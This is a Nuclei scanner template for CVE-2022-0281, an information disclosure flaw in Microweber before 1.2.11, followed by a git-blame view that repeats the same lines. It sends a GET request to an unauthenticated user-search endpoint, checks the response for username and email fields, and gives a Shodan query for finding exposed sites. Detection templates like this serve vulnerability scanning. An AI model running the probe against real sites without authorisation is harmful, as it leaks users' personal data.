nuclei-templates/cves/2022/CVE-2022-0281.yaml

id: CVE-2022-0281

info:
  name: Microweber Information Disclosure
  author: pikpikcu
  severity: high
  description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0281
  tags: cve,cve2022,microweber,disclosure
  metadata:
    shodan-query: 'http.favicon.hash:780351152'

requests:
  - method: GET
    path:
      - "{{BaseURL}}/api/users/search_authors"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - '"display_name":'
        condition: and
Create CVE-2022-0281.yaml 2022-02-06 05:28:32 +00:00			`id: CVE-2022-0281`

			`info:`
			`name: Microweber Information Disclosure`
			`author: pikpikcu`
			`severity: high`
			`description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-0281`
			`tags: cve,cve2022,microweber,disclosure`
Update CVE-2022-0281.yaml 2022-02-06 10:17:40 +00:00			`metadata:`
			`shodan-query: 'http.favicon.hash:780351152'`
Create CVE-2022-0281.yaml 2022-02-06 05:28:32 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/api/users/search_authors"`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: body`
			`words:`
			`- '"username":'`
			`- '"email":'`
			`- '"display_name":'`
			`condition: and`